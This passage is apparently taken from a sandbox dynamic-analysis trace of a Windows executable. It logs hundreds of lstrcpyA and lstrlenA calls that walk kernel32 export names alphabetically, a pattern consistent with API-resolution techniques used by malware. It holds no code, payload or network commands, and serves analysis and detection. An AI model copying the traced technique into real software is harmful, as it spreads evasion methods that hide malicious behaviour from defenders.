returned="AddSecureMemoryCacheCallback" [0079.419] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.419] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.419] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.419] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.419] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.419] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.419] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.419] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.420] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.420] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.420] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.420] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.420] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.420] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.420] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.420] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.420] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.420] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.420] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.420] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.420] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.420] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.420] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.420] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.420] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.421] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.421] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.421] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.421] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.421] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.421] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.421] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.421] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.421] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.421] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.421] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.421] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.421] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.421] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.421] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.421] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.421] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.422] lstrlenA (lpString="BEEP") returned 4 [0079.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.422] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.422] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.422] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.422] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.422] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.422] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.422] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.422] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.422] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.422] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.422] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.422] lstrlenA (lpString="CANCELIO") returned 8 [0079.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.422] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.422] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.422] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.422] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.422] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.423] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.423] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.423] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.423] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.423] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.423] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.423] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.423] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.423] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.423] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.423] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.423] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.423] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.423] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.423] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.423] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.423] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.423] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.423] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.423] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.423] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.423] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.423] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.423] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.423] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.423] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.423] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.423] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.423] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.423] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.423] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.423] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.423] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.423] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.423] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.423] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.424] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.424] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.424] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.424] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.424] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.424] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.424] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.424] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.424] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.424] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.424] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.424] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.424] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.424] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.424] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.424] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.424] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.424] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.424] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.424] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.424] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.424] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.424] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.424] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.424] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.424] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.424] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.424] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.424] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.424] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.424] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.424] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.424] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.424] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.424] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.424] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.425] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.425] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.425] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.425] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.425] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.425] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.425] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.425] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.425] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.425] lstrlenA (lpString="COPYFILEA") returned 9 [0079.425] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.425] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.425] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.425] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.425] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.425] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.425] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.425] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.425] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.425] lstrlenA (lpString="COPYFILEW") returned 9 [0079.425] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.425] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.425] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.425] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.425] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.425] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.425] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.425] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.425] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.425] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.425] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.426] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.426] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.426] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.426] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.426] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.426] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.426] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.426] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.426] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.426] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.426] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.426] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.426] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.426] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.426] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.426] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.426] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.426] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.426] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.426] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.426] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.426] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.426] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.426] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: 